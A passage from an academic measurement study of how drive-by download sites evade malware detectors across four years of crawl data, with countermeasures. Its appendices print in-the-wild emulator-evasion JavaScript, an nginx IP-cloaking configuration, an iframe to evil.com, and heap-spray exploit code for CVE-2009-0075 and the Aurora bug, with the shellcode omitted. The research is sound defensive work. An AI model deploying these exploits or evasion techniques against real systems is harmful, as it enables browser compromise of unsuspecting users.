For each of these pages, we *rescore* the original HTTP responses and VM state changes that were stored in our database using a fixed version of PageScorer from the end of October, 2010. This version consisted of algorithms and data files, including AV signature files, from the end of the data collection period. By fixing the scorer we ensure that any observable trends are due to changes in the data, and are not due to the evolution of our algorithms. The output of this rescore comprises Data Set II.

In sum, Data Set II consists of $\sim$160 million distinct web pages from $\sim$8 million sites. We enabled JavaScript tracing on a subset of this data, comprising $\sim$75 million web pages from $\sim$5.5 million distinct sites.

In this paper the term *site* refers to a domain name unless the domain corresponds to a hosting provider. In the latter case, different host names are indicative of separate content owners, so we take the host name as the site. For example, http://www.cnn.com/ and http://live.cnn.com/ both correspond to the site cnn.com, whereas http://foo.blogspot.com/page1.html and http://bar.blogspot.com/page2.html are mapped to foo.blogspot.com and bar.blogspot.com, respectively. Throughout this paper we provide statistics at the site level, and aggregate data by month. We do this to avoid skew that could occur if our sampling algorithm selected many pages from the same site. For example, if the system encountered exploits in a given month on two URLs that belong to the same site, we count only one exploit.



**Figure 2: The graph shows the total number of sites per month in Data Set II. The large spike in 2008 is due to the unexpected appearance of a benign process that caused many more pages to be included in our analysis during that time.**

Figure 2 shows the number of sites in Data Set II for each month, both with and without JavaScript tracing, along with the total number of sites containing pages that were marked as drive-by downloads in Data Set II. The large spike in the fall of 2008 is due to a misconfiguration in PageScorer, which mistakenly labeled a benign process as malicious. This did not result in any misclassification at the time since no other scanners produced corroborating signals. Our results are also unaffected by the misconfiguration because it was fixed before we reclassified the data. Ignoring the outlier, on average the data set consists of ~387,000 sites per month, of which ~257,000 launched drive-by downloads and ~170,000 were processed with JavaScript tracing enabled.

Our data set comes with some caveats. First, we are measuring the trends observed by our systems. If we never observed malicious behavior from a given malware campaign, then the results are not included in our study. We believe, however, that Google Safebrowsing's position provides a useful vantage point into malware on the web. Second, results derived from Data Set II cannot be compared to real-time performance of other technologies. Data Set II is generated using data, e.g., AV signatures, and algorithms that might not have been available when the pages were originally encountered. Third, while reclassifying pages to create Data Set II ensures that modifications to our algorithms do not create artificial trends, the pages that comprise Data Set II were selected because they originally exhibited suspicious behavior as determined by PageScorer. To alleviate the impact of this potential bias, we add a 1% random sample, constituting ~80 million URLs, as well as include pages that were originally classified as suspicious, but not malicious. This ensures that Data Set II includes pages that our algorithms may have missed in the past. Fourth, we believe that false positives are rare in our data set. This is difficult to quantify in an operational setting, but in our experience, based on internal analysis, reports from users, web masters, and StopBadware.org/, the system generates negligible false positives. Over four years of operation we have had fewer than a handful of incidents causing false positives.

## 5. TRENDS IN EVASION

In Section 3 we discussed the possible ways in which malicious web pages can be designed to resist detection. This section ana-



**Figure 3: The graph shows the number of sites involved in Social Engineering attacks compared to all sites hosting malware or exploits.**

lyzes the data generated by the detection infrastructure described in Section 4. We assess the extent to which techniques that hinder automatic detection are employed by adversaries on the Internet. We focus on the challenges that face each of the four detection techniques, and discuss potential measures to adapt to the various challenges.

### 5.1 Challenges for VM-based Detection

As mentioned earlier, social engineering is an emerging attack trend that could potentially limit the effectiveness of VM-based detection schemes. To measure whether adversaries employ social engineering techniques, we analyzed Data Set II with heuristics [18] to identify pages that were likely generated from templates employed by Fake AV campaigns. Figure 3 shows the number of social engineering sites detected monthly relative to all sites involved in distributing malware or exploits. The prevalence of social engineering has increased over the last four years. Although regular malware sites still constitute about 98% of all distribution sites, we see an increase in the number of sites employing social engineering. In January 2007, there was only one site distributing Fake AV, whereas by September, 2010 this number increased to 4,230.

One example of user interaction frequently found on Fake Anti-Virus pages is a dialog that requires a mouse click before a malware binary is sent to the browser. This can be a dialog from the system, or a dialog simulated by the web page with images or CSS. To assess the extent to which malware authors have adopted this technique, we instrumented our operational VM system to initiate mouse clicks on the current web page. We then evaluated each social engineering site twice: once without any interaction and another time with mouse clicking enabled. We examined a subset of 210,000 pages from Data Set I from October 1, 2010 to April 1, 2011 and compared the percentage of malware downloads in both cases. With clicking enabled, we measured a 40% increase of malware binaries downloaded by the VMs.

There are several possible explanations for the increasing popularity of social engineering attacks: (1) These attacks are successful even if no exploitable vulnerabilities are present in the browser environment; (2) For Fake AV, social engineering provides a direct route to monetization; (3) Social engineering attacks make VM-based detection harder since malicious payloads appear only after user interaction with the browser. The first explanation seems



**Figure 4: The heat map shows the relative distribution of exploits encountered on the web over time. Every second CVE is labeled on the Y-axis.**

| CVE # | Δ days | CVE # | Δ days |
|-------|--------|-------|--------|
| 2008-3008 | 4 | 2008-0015 | -3 |
| 2009-4324 | 2 | 2007-5779 | -3 |
| 2008-2463 | 2 | 2007-3148 | -3 |
| 2008-0955 | 2 | 2008-1472 | -6 |
| 2007-4983 | 2 | 2010-0886 | -7 |
| 2009-0075 | 1 | 2009-3672 | -10 |
| 2010-2883 | 0 | 2007-5064 | -35 |
| 2010-1818 | 0 | 2009-2496 | -36 |
| 2010-0806 | -3 | 2007-6144 | -87 |
| 2008-0623 | -3 | 2008-6442 | -242 |

**Table 1: Number of days after public release of vulnerability (Δ days) that exploits were seen in Data Set II. Negative numbers indicate that the exploit was seen before public release.**

less likely as exploitable vulnerabilities were present in all versions of Internet Explorer and popular plugins during the course of our study. Regardless of the motive, social engineering poses a challenge to VM-based honeypots must be accounted for.

**Countermeasures.** These results show that VM honeypots without user interaction may not detect web pages distributing malware via social engineering. In addition to simulating user interacting with the VM, one can also improve detecting by pursuing a signature based approach [18].

## 5.2   Browser Emulation Circumvention

We hypothesize that drive-by download campaigns primarily employ two tactics to circumvent Browser Emulation: rapid incorporation of zero-day exploits, and heavy obfuscation that targets differences between the emulator and a browser. We consider both in this section.

**Exploit Trends.** Once a vulnerability becomes public, it is quickly integrated into exploit kits. As a result, Browser Emulators need to be updated frequently to detect new vulnerabilities. To highlight the changing nature of exploitation on the web, we show the relative prevalence of each of the 51 exploits identified by our Browser Emulator in Data Set II in Figure 4. We see that 24 exploits are relatively short lived and are often replaced with newer exploits when new vulnerabilities are discovered. The main exception to this is the exploit of the MDAC vulnerability which is part of most exploit kits we encounter and represented by the dark line at the bottom of the heat map. This data highlights an important opportunity for evasion. Each time a new exploit is introduced, adversaries have a window to evade Browser Emulators until they are updated. Of the 51 exploits that we tracked, the median delay between public disclosure[1] and the first time the exploit appeared in Data Set II was 20 days. However, many exploits appear in the wild even before the corresponding vulnerability is publicly announced. Table 1 shows the 20 CVEs that have the shortest delay between public announcement and when the exploit appeared in Data Set II.

**Obfuscation.** To thwart a Browser Emulator, exploit kits typically wrap the code that exercises the exploit in a form of obfuscation

---
[1] As recorded at http://web.nvd.nist.gov/.

that may not execute correctly in an emulated environment, but will work correctly in a real browser. This generally results in complex run-time behavior. To measure whether adversaries are turning to such techniques we examined the data that was generated with JavaScript tracing enabled in Data Set II and computed three different complexity measures:

- *Number of function calls* measures the number of JavaScript function calls made in a trace.

- *Length of strings passed to function calls* measures the sum of the lengths of all strings that are passed to any user-defined or built in JavaScript function.

- *DOM Interaction* measures the total number of DOM methods called and DOM properties referenced as the JavaScript executes.

We first consider the number of JavaScript function calls made when evaluating a page. To establish a baseline we counted the number of function calls made during normal page load for each of the benign web pages in Data Set II. We also counted the number of function calls made before delivering the first exploit for each of the malicious pages in our Data Set II. As our analysis is based on sites rather than individual web pages, we compute the average value for sites on which we encounter multiple web pages in a given month. While sites with exploits are less frequent than benign sites, our analysis finds between ∼50 and ∼150 thousand unique sites containing exploits per month with the exception of the first few months in 2007 where the overall number of analyzed sites is smaller.

Figures 5 and 6 show the 20%, 50% and 80% quantiles for the number of function calls for both benign and malicious web sites. In Figure 5, we see an order of magnitude increase in the number of JavaScript function calls for benign sites. Figure 6 shows a change of over three orders of magnitude for the median for sites that deliver exploits. At the beginning of 2007, we observe about 20 JavaScript function calls, but the number of function calls jumped to ∼7,000 in 2008, and again to 70,000 in December 2009.

The number of JavaScript function calls in Figure 6 exhibits several distinct peaks and valleys. These can be explained by two phenomena. First, certain exploits require setup that employs more function calls than others. The decrease in number of function calls in Autumn 2008, and again in the end of 2010 correspond to the increasing prevalence of exploits against RealPlayer (CVE-2008-1309) and a memory corruption vulnerability in IE (CVE-2010-0806). The proof-of-concept exploits that were wrapped into



**Figure 5: The graph shows the number of JavaScript function calls for benign web sites. Over the measurement period, we observe an order or magnitude increase for the median.**



**Figure 6: The graph shows the number of JavaScript function calls for web sites with exploits. We count only the function calls leading up to the first exploit. We observe an increase of over three orders of magnitude for the median over the measurement period.**



**Figure 7: The graph shows the string length complexity measure on benign pages.**



**Figure 8: The graph shows the string length complexity measure on pages with exploits.**

exploit kits made few function calls, spraying the heap with simple string concatenation. However, the increased count at the beginning of 2009 and early 2010 correspond to exploits targeting two other memory corruption bugs in IE, CVE-2009-0075, and CVE-2010-0249. The proof-of-concept for these exploits prepared memory by allocating many DOM nodes with attacker controlled data, and thus required many function calls to launch the exploit, see Appendix C and D for example source code.

The second phenomenon that explains the general upward trend is the appearance of new JavaScript packers that obfuscate code using cryptographic routines such as RSA and RC4, which make many function calls. To trigger an exploit, it is usually not necessary to call many functions. For example, our system encountered exploits for CVE-2010-0806 for the first time in March 2010. At that time, the median number of functions calls to exploit the vulnerability was only 7, whereas the median rose to 813 in July 2010. Thus we attribute the rise in complexity to obfuscation meant to thwart emulation or manual analysis.

Next we consider the total string length complexity measure. See

Figures 7 and 8 for this metric on benign and malicious pages, respectively. As with the number of function calls, we see a general upward trend. We believe these trends are influenced more by packers than by choice of exploit. The reason for this is that heap sprays generally do not pass long strings to method calls; more often they concatenate strings or add strings to arrays. Thus, these trends measure changes in packers over time. Clearly, as the size of exploit kits and the complexity of packing algorithms grow, so does the total amount of data that must be deobfuscated.

Another way to assess the complexity of JavaScript is to determine which DOM functions are called before reaching an exploit. This measurement captures obfuscation that probes the implementation of a Browser Emulator for completeness. We instrumented our JavaScript engine to record the usage of 34 DOM functions and properties that are commonly used or involved in DOM manipulations, see Appendix E. We then compute the relative frequency of these calls for both benign pages, and pages that deliver exploits. Figures 9 and 10 show heat maps plotting the relative frequencies of each DOM function or property. The darkness of each entry rep-



**Figure 9: The heat map shows the DOM functions utilized by benign web pages over time.**



**Figure 10: The heat map shows the DOM functions utilized by exploit JavaScript over time.**

resents the fraction of sites that utilize that specific DOM function or property.

For benign pages, the number of DOM accesses has increased as the web has become more interactive and feature rich. For benign web sites, we note that the indices of the most common functions are 3 and 13, which refer to `document.body` and `getElementById` respectively. DOM access patterns for sites that deliver exploits are remarkably different as significantly fewer DOM interactions are found. Two indices, 7 and 31 stand out. They refer to `createElement` and `setAttribute` respectively. These two functions are employed to exploit MDAC (CVE-2006-0003) [8] which has been popular since 2006 and is part of most exploit kits. While Figure 9 shows that the `clearAttributes` function is not commonly used in benign web pages, we see a sudden increase of it in exploits in February 2009. This coincides with the public release of exploits targeting CVE-2009-0075; see Appendix C.

Further examination of this exploit indicates that the delivery mechanism has been updated over time to exercise an increasing number of DOM API functions. When the exploit was first released, it made use of only the three functions that are necessary to launch the exploit: `createElement`, `clearAttributes`, and `cloneNode`[2]. Over time, however, there was a steady uptick in the number of non-essential DOM functions that were called before delivering the payload; see Figure 11. Starting in March 2010, about 20% of sites exploiting this vulnerability also make calls to `appendChild` and read `innerHTML`. In May 2010, more DOM functions are called to stage the exploit. This change in behavior indicates that the JavaScript to stage the exploit has become more complex, likely to thwart analysis.

**Countermeasures.** The trends in exploitation technique and each of the complexity measures indicate that the perpetrators of drive-by download campaigns are devoting significant effort towards evading detection. In order to keep pace with zero-days and obfuscation techniques, Browser Emulators should be frequently updated. To facilitate such updates, it is possible to monitor the system for unexpected errors or to compare its output to AV engines or a VM infrastructure to identify potential deficiencies. One could also rely on these other technologies to address inherent limitations, for instance VM honeypots can be used to detect zero-days. We analyze



**Figure 11: The heat map shows the DOM functions utilized to exploit CVE-2009-0075. The graph shows that only two DOM functions are required to trigger the exploit, but that over time the DOM interactions have become more complex.**

the relative performance of our Browser Emulator in Section 6.

## 5.3 AV Circumvention

AV engines commonly use signature-based detection to identify malicious code. While it is well-known that even simple packers can successfully evade this approach, we wanted to understand the impact of evasion techniques at a large scale. Specifically, we measured two aspects of evasion. First, we studied whether deobfuscating web content would significantly improve detection rates. Second, we studied how often AV vendors change their signatures to adapt to both False Positives and False Negatives.

To study the impact of deobfuscation, we leveraged our Browser Emulator and hooked all methods that allow for dynamic injection of code into the DOM, e.g., by recording assignment to `innerHTML`. The line labeled *Deobfuscated* in Figure 12 shows the percent of additional sites in `Data Set II` that were flagged by AV engines only after providing the engines with this injected content. This drastically improves performance of the AV engines, in some cases by

---

[2]We did not label `cloneNode` as a function of interest during our analysis.



**Figure 12: The graph shows the monthly percentage of sites with changing virus signals between** Data Set I **and** Data Set II**.**

**Figure 13: The graph shows malware distribution chain length over time.**

more than 40%.

To study the impact of changes to AV signatures, we compared our AV classifications for each page in Data Set II to its original classification in Data Set I. Figure 12 shows the percentage of sites with at least one virus signal change. The line labeled *Added* shows the percentage of sites that had AV signals in Data Set II but not in Data Set I. As the graph shows, a significant percentage of sites have new virus signals when they are rescored. These changes could be due to three causes: (1) delay in signature updates in our operational environment; (2) AV vendors pruning signatures over time; and (3) Improvements of AV signatures over time by AV vendors. We believe that the discrepancy is due to (3), since we update our AV signatures every two hours in our operational setting, and one of our AV vendors confirmed that only the signatures that cause false positives are pruned. This implies that AV engines can suffer from significant false negatives in operational settings. Looking back only one year, about 40% of the sites with virus signals were only seen in Data Set II. The line labeled *Removed* shows the percentage of sites with pages that were flagged by AV engines in Data Set I but not in Data Set II. These removals are likely due to signatures that produced false positives. The general downward trend for each of the three plots can be explained by the fact that as we come to the end of the data collection period, the AV signatures that were used for both Data Set II and Data Set I become similar to one another.

Both of these experiments indicate that while AV vendors strive to improve detection rates, in real time they cannot adequately detect malicious content. This could be due to the fact that adversaries can use AV products as oracles before deploying malicious code into the wild.

**Countermeasures.** Our results show that the JavaScript packing employed by malware distribution sites has a direct impact on the accuracy of AV scanners and that Signature-based AV detection can suffer from both false negatives and false positives. Nonetheless, some procedures can improve detection. To maintain optimum detection, one should continuously update virus definitions. One can also improve detection by using multiple AV engines. Perhaps the best way to improve upon AV detection rates is to use them as a component in a larger system.

### 5.4 Circumventing Domain Reputation

Evading classification by Domain Reputation Data simply involves registering more domains to distribute malware. This generally involves two steps: registering domains en masse, and setting up redirectors to send traffic to these domains. To measure trends in registering new domains, we computed the observed lifetime of distribution domains in Data Set II. We estimate a lower bound for lifetime as the interval between the time the site first appeared in our data to the last time it appeared in our data. We ignore sites that appeared only once, or whose life span is less than 10 minutes. In total we observed $\sim 1.6$ million distribution domains, of which $\sim 295,000$ appeared only once, and $\sim 330,000$, had a lifespan of less than 10 minutes. The median lifetime reduced significantly over our data collection period; from one month between 2007 and 2009, down to one week in July 2010, and down to 2 hours in October 2010.

In addition to domain rotation, adversaries attempt to avoid reputation-based detection by setting up intermediary sites whose sole purpose is to funnel traffic to distribution site. Figure 13 shows the length of malware distribution chains over time in Data Set II. The median is about one to two domains. Several sites use longer distribution chains with a 90th percentile of about 4 hops. The maximum chain length we observed was 20 hops. In many cases, a single redirector funnels traffic to several distribution sites. We measured the out-degree of sites involved in these chains and observed that about 35% of intermediary sites redirected to more than one distribution site. One notable example is a site that, at the time of this writing, is still active and redirected to over 1,600 malicious sites.

**Countermeasures.** We observed domain rotation frequently throughout our study. We believe that this is an attempt to evade reputation-based signals, or public domain blacklists. Two possible countermeasures to this type of evasion are: (1) successfully classifying redirectors as belonging to a campaign; and (2) classifying aggressively at the IP level. The second countermeasure is complicated by hosting providers that are typically abused by miscreants, but also serve legitimate sites.

### 5.5 IP Cloaking

IP Cloaking can be the most effective form of evasion, since it thwarts any sort of detection by client honeypots or AV engines.



**Figure 14: The graph shows how many compromised sites include content from cloaking sites in** Data Set II



**Figure 15: The graph shows sites with Exploit and New Process signals.**

For an adversary, IP-based cloaking is simple to deploy and usually requires only small changes to the web server's configuration; see Appendix B. To understand trends in IP cloaking, we computed the number of sites that actively cloak against our scanners using data from Data Set II. As described in Section 4, this detection is built into our Domain Reputation pipeline, and involves testing for content changes from different IP addresses. To measure cloaking in Data Set II, we aggregated the sites that we had discovered to cloak against our scanners, and counted how often resources from those sites were included by pages in Data Set II.

Figure 14 shows the number of sites per month that include content from domains known to be cloaking. The graph peaks in August 2009 at over 200, 000 sites infected by cloaking domains. That peak coincides with a large-scale attack, where thousands of sites were infected to redirect to gumblar.cn, which actively cloaked our scanners.

Although the increase in the graph is partly due to improved detection of cloaking domains in our system, we believe that it is representative of the general state of cloaking. In our operational practice, we continuously monitor compromised web sites and the malicious resources they include. In 2008, we discovered that some malware domains no longer returned malicious payloads to our system but still did so to users. As a result, we developed detection for cloaking. At the time of this writing, IP cloaking contributes significantly to the overall number of malicious web sites found by our system. See Section 6 for a more detailed analysis.

**Countermeasures.** Our data indicates that IP-based cloaking has drastically increased over the lifetime of our data collection. If an adversary is suspected of cloaking against a set of known IP addresses, a detector can also initiate scans via a set of IP addresses unknown to the adversary. Observed differences in these extra scans likely indicates cloaking. It is important to rate-limit fetches from the unknown set of IP addresses to limit their visibility to the adversary. A detector can then establish a feedback loop and build a classifier that leverages the cloaking data to identify pages that launch drive-by downloads. Instead of generating signals based on the presence of a VM, Browser Emulator, or AV signals, it is possible to flag the page based on the inclusion of content from a cloaking domain.

## 6. MULTIFACETED MALWARE DETECTORS

As the results in Section 5 have shown, adversaries are actively changing exploitation techniques to evade detection. These efforts are not limited to any specific detection technique. In this section we consider the potential for a multi-faceted approach that leverages a combination of signals from different detection systems. In the following, we analyze Data Set II and present pair-wise comparisons between each of the four detection systems in the form of stacked bar graphs. We refer to a positive output from a detection system as a *signal*. The black and white bands denote the number of times one signal appeared on a site but not the other. The gray band denotes the number of times both signals appeared at the same time. Data is aggregated monthly to give over our four-year measurement period.

Figure 15 demonstrates how Browser Emulation and VM honeypots can be combined to increase detection rates. We denote the signal output from the Browser Emulator as *Exploit*. In the case of VM detection we use the creation of new processes on the VM as a signal labeled *NewProcess*. For example, in December, 2008, 120, 000 sites had the NewProcess signal, 98, 000 had the Exploit signal, and 88, 000 sites had both. Although both signals appear together on a large fraction of sites, during some time periods, they cover significantly different cases. In January 2009, Browser Emulation found 43, 000 sites that did not trigger a NewProcess signal. In June 2008, the NewProcess signal identified 68, 000 sites that were missed by emulation. Over the entire time period both signals agreed 60.3% of the time. The Exploit signal triggered by itself 9.3% of the time whereas the New Process signal occurred by itself 30.4% of the time. This indicates that neither signal suffices to provide good detection, but both can be used to complement one another.

Figures 16 and 17 compare both Exploit and NewProcess signals to Anti-Virus signals labeled *Virus*. On average, AV signals and Exploit signals intersect on 45.4% of the sites, although AV signals appear on 54.4% of sites that do not have Exploit signals. On average, AV signals and NewProcess signals occur together on 57.3% of the sites. However, AV signals appear on 39.4% of sites where we did not get any NewProcess signals. AV engines trigger independently on events in the data set. We investigated the causes of the excess AV signals and noticed that many were due to AV signatures that flag web pages with resources, e.g., IFRAMES, pointing to web-sites that match certain regular expression patterns,



**Figure 16: The graph shows sites with Exploit and Virus signals.**



**Figure 17: The graph shows sites with New Process and Virus signals.**

regardless of the content served by these sites. In other cases, AV engines were flagging binary downloads delivered by social engineering and thus did not trigger any exploit signals. As discussed in Section 5.3, AV engines are susceptible to false positives in operational settings, and thus cannot be solely relied upon to flag malicious sites.

While each of the aforementioned detection technologies can be combined to improve web malware detection, they all remain susceptible to IP cloaking which prevents the classifiers from seeing malicious content. To illustrate the impact of cloaking we compare the detection based on all the above signals combined versus detection based on domain reputation. The bars labeled *BadSignal* in Figure 18 show how often an Exploit, NewProcess, or Virus signal occurs on a site in a given month. We compare this to sites that include content from a site known to distribute malware labeled *Reputation*. From 2007 through 2008, 7.21% of sites had only a bad reputation signal. In 2009, this number increased to 36.5%, and in 2010 it increased to 48.5%. Note that the dramatic increase in sites only detected by cloaking corresponds to the jump in cloaking behavior in Figure 14. At the same time the number of sites with only BadSignals remains low, which implies that our system is able to boot strap classification of domains that cloak with only a small amount of data.

# 7. CONCLUSION

Researchers have proposed numerous approaches for detecting the ever-increasing number of web sites spreading malware via drive-by downloads. Adversaries have responded with a number of techniques to bypass detection. This paper studies whether evasive practices are effective, and whether they are being pursued at a large scale.

Our study focuses on the four most prevalent detections techniques: Virtual Machine honeypots, Browser Emulation honeypots, Classification based on Domain Reputation, and Anti-Virus Engines. We measure the extent to which evasion affects each of these schemes by analyzing four years worth of data collected by Google SafeBrowsing infrastructure. Our experiments corroborate our hypothesis that malware authors continue to pursue delivery mechanisms that can confuse different malware detection systems. We find that Social Engineering is growing and poses challenges to VM-based honeypots. JavaScript obfuscation that interacts heavily with the DOM can be used to evade both Browser Emulators and



**Figure 18: The graph shows sites with bad signals vs sites that include content from a site with bad reputation.**

AV engines. In operational settings, AV Engines also suffer significantly from both false positives and false negatives. Finally, we see a rise in IP cloaking to thwart content-based detection schemes.

Despite evasive tactics, we show that adopting a multi-pronged approach can improve detection rates. We hope that these observations will be useful to the research community. Furthermore, these findings highlight important design considerations for operational systems. For example, data that is served to the general public might trade higher false negative rates for reduced false positives. On the other hand, a private institution might tolerate higher false positive rates to improve protection. Furthermore, a system that serves more users might become a target of circumvention and thus need to devote extra effort to detect cloaking.

# 8. REFERENCES

[1] M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and N. Feamster. Building a Dynamic Reputation System for DNS. In *Proceedings of the 19th USENIX Security Symposium (August 2010)*.

[2] F. Chang, J. Dean, S. Ghemawat, W. Hsieh, D. Wallach, M. Burrows, T. Chandra, A. Fikes, and R. Gruber. Bigtable:

A distributed storage system for structured data. *ACM Transactions on Computer Systems (TOCS)*, 26(2):1–26, 2008.

[3] M. Cova, C. Kruegel, and G. Vigna. Detection and analysis of drive-by-download attacks and malicious JavaScript code. In *Proceedings of the 19th international conference on World wide web*, pages 281–290. ACM, 2010.

[4] M. Felegyhazi, C. Kreibich, and V. Paxson. On the Potential of Proactive Domain Blacklisting. In *Proceedings of the 3rd USENIX conference on Large-scale exploits and emergent threats: botnets, spyware, worms, and more*, page 6. USENIX Association, 2010.

[5] Google. V8 JavaScript Engine. `http://code.google.com/p/v8/`.

[6] Microsoft. About Conditional Comments. `http://msdn.microsoft.com/en-us/library/ms537512(v=vs.85).aspx`.

[7] Microsoft. Conditional Compilation (JavaScript). `http://msdn.microsoft.com/en-us/library/121hztk3(v=vs.94).aspx`.

[8] Microsoft. Microsoft Security Bulletin MS06-014: Vulnerability in the Microsoft Data Access Components (MDACS) Function Could Allow Code Execution., May 2006.

[9] A. Moshchuk, T. Bragin, D. Deville, S. Gribble, and H. Levy. Spyproxy: Execution-based detection of malicious web content. In *Proceedings of 16th USENIX Security Symposium on USENIX Security Symposium*, pages 1–16. USENIX Association, 2007.

[10] A. Moshchuk, T. Bragin, S. Gribble, and H. Levy. A crawler-based study of spyware in the web. In *Proceedings of Network and Distributed Systems Security Symposium*, 2006.

[11] Mozilla. JavaScript:TraceMonkey. `https://wiki.mozilla.org/JavaScript:TraceMonkey`.

[12] Mozilla. What is SpiderMonkey? `http://www.mozilla.org/js/spidermonkey/`.

[13] J. Nazario. PhoneyC: A virtual client honeypot. In *Proceedings of the 2nd USENIX conference on Large-scale exploits and emergent threats: botnets, spyware, worms, and more*, page 6. USENIX Association, 2009.

[14] J. Oberheide, E. Cooke, and F. Jahanian. Cloudav: N-version Antivirus in the Network Cloud. In *Proceedings of the 17th conference on Security symposium*, pages 91–106. USENIX Association, 2008.

[15] T. H. Project. Capture-hpc. http://projects.honeynet.org/capture-hpc.

[16] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All Your iFRAMEs Point to Us. In *USENIX Security Symposium*, pages 1–16, 2008.

[17] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and N. Modadugu. The Ghost in the Browser: Analysis of Web-based Malware. In *Proceedings of the first USENIX workshop on hot topics in Botnets (HotBots'07)*, April 2007.

[18] M. A. Rajab, L. Ballard, P. Mavrommatis, N. Provos, and X. Zhao. The Nocebo Effect on the Web: An Analysis of Fake Anti-Virus Distribution. In *Proceedings of the 3rd USENIX Workshop on Large-Scale Exploits and Emergent Threats (LEET)*, April 2010.

[19] Y.-M. Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, S. Chen, and S. King. Automated web patrol with strider honeymonkeys. In *Proceedings of Network and Distributed Systems Security Symposium*, pages 35–49, 2006.

# APPENDIX

## A. ANALYSIS-RESISTANT JAVASCRIPT

Here we provide examples of code from the wild that actively try to evade browser emulators. The code has been deobfuscated for readability purposes. As discussed in Section 3, there are at least three different browser characteristics that can be tested before delivering a payload: JavaScript environment, parser capabilities, and the DOM.

**JavaScript Environment.** IE's JavaScript environment is different than those provided by other open source JavaScript engines. For example, IE allows `;` before a `catch` or `finally` clause in JavaScript, whereas SpiderMonkey will report a parse error.

```
try{} ; catch(e) {} bad();
```

IE also supports case-insensitive access to ActiveX object properties in JavaScript.

```
var obj=new ActiveXObject(objName);
obj.vAr=1; if (obj.VaR==1) bad();
```

Malicious web pages often identify emulators by testing that ActiveX creation returns sane values.

```
try {new ActiveXObject("asdf")} catch(e) {bad()}
```

IE also supports the `execScript` method, which evaluates code within the global scope, whereas other engines do not.

**JavaScript and HTML Parsers.** IE supports conditional compilation in JavaScript [7], other browsers do not. Thus IE's JavaScript parser knows how to parse the following comment, and will generate code that calls the function `bad()` only in the 32-bit version of IE.

```
/* @cc_on
  @if (@_win32)
    bad();
  @end
@ */
```

IE also supports conditional parsing in its HTML parser. Conditional comments allow IE to execute code contingent upon version numbers [6].

```
<!--[if IE 9]><iframe src=http://evil.com/</iframe><![endif]-->
```

Integration between the HTML parser and the scripting environment may also be tested by examining the behavior of `document.write`. The output of this call should be immediately handled by the parser, and any side effects should be immediately propagated to the JavaScript environment.

```
document.write("<div id=d></div>")
if (d.tagName=="DIV") bad()
```

**The DOM.** There are many ways in which the DOM can be probed for feature-completeness. The snippet from the figure below was found in the wild. It tests that the DOM implementation yields the correct tree-like structure, even in the face of misnested close tags. It also verifies that the `title` variable is correctly exposed within the `document` object.

```
<html><head><title>split</title></head><body>
<b id="node" style="display:none;">999999qq
<i>99999999qqf<i>rom<i>Ch<i>a</i>rC</i>o</i>
d</i>e</i>qq</i>ev</i>alqqwin<i>do</i>w</b>
<script>
function nfc(node) {
  var r = "";
  for(var i=0; i<node.childNodes.length; i++) {
    switch(node.childNodes[i].nodeType) {
```

```
      case 1: r+=nfc(node.childNodes[i]); break;
      case 3: r+=node.childNodes[i].nodeValue;
    }
  }
  return r;
}

var nf = nfc(node)[document.title]("qq");
</script>
<script>
window["cccevalccc".substr(3,4)]("var nf_window="+nf[4]);
var data = "qq10qq118qq97[...]";

var data_array = data[document.title]("qq");
var jscript = "";
for (var i=1; i<data_array.length; i++)
    jscript+=String[nf[2]](data_array[i]);
nf_window[nf[3]](jscript);
```

## B.   IP-BASED CLOAKING

nginx configuration file for disallowing requests from certain IP addresses.

```
user apache;
worker_processes  2;

http {
  ...

  #//G
  deny XXX.XXX.160.0/19;
  deny XXX.XXX.0.0/20;
  deny XXX.XXX.64.0/19;
  ...

  server {
    listen 8080;
    location / {
      proxy_pass        http://xxxxx.com:4480;
      proxy_redirect    off;
      proxy_ignore_client_abort on;
      proxy_set_header  X-Real-IP  $remote_addr;
      proxy_set_header  Host       $host;
      proxy_buffers     100 50k;
      proxy_read_timeout 300;
      proxy_send_timeout 300;
    }
  }
}
```

## C.   EXPLOIT FOR CVE-2009-0075

```
var sc = unescape("..."); // shellcode
var mem = new Array();
var ls = 0x100000 - (sc.length * 2 + 0x01020);
var b = unescape("%u0c0c%u0c0c");
while (b.length < ls / 2) b += b;

var lh = b.substring(0, ls / 2);
delete b;
for (i = 0; i < 0xc0; i++) mem[ i ] = lh + sc;

CollectGarbage();
var badsrc = unescape(
  "%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAA");
var imgs = new Array();
for (var i = 0; i < 1000; i++)
  imgs.push(document.createElement("img"));

obj1 = document.createElement("tbody");
obj1.click;
var obj2 = obj1.cloneNode();
obj1.clearAttributes();
obj1 = null;
CollectGarbage();
for (var i = 0; i < imgs.length; i++)
  imgs[i].src = badsrc;
obj2.click;
```

Code to exploit the bug described by CVE-2009-0075.

## D.   THE "AURORA" EXPLOIT

```
<html><head><script>
var evt = null;
// SKIPPED: Generate shellcode and the spray heap.
var a = new Array();
for (i = 0; i < 200; i++) {
  a[i] = document.createElement("COMMENT");
  a[i].data = "abcd";
}

function ev1(evt) {
  evt = document.createEventObject(evt);
  document.getElementById("handle").innerHTML = "";
  window.setInterval(ev2, 50);
}

function ev2() {
  var data = unescape(
    "%u0A0a%u0A0a%u0A0a%u0A0a"
    "%u0A0a%u0A0a%u0A0a%u0A0a%u0A0a");
  for (i = 0; i < a.length; i++)
    a[i].data = data;
  evt.srcElement;
}
</script></head><body>
<span id="handle"><img src="foo.gif" onload="ev1(event)" />
</span></body></html>
```

Code to exploit the bug described by CVE-2010-0249. Emulating this correctly requires a proper DOM implementation and event model.

## E.   DOM FUNCTIONS

This appendix provides the listing of functions and properties that we labeled during JavaScript tracing. For properties, we differentiate between read and write access, e.g. reading the innerHTML property is different than writing to it.

| | | | |
|---|---|---|---|
| 0 | addEventListener | 17 | hasAttribute |
| 1 | appendChild | 18 | hasChildNodes |
| 2 | attachEvent | 19 | innerHTML (read) |
| 3 | body (read) | 20 | innerHTML (write) |
| 4 | childNodes (read) | 21 | insertBefore |
| 5 | clearAttributes | 22 | lastChild (read) |
| 6 | createComment | 23 | nextSibling (write) |
| 7 | createElement | 24 | outerHTML (read) |
| 8 | createTextNode | 25 | outerHTML (write) |
| 9 | detachEvent | 26 | parentNode (read) |
| 10 | documentElement (read) | 27 | previousSibling (read) |
| 11 | firstChild (read) | 28 | removeAttribute |
| 12 | getAttribute | 29 | removeChild |
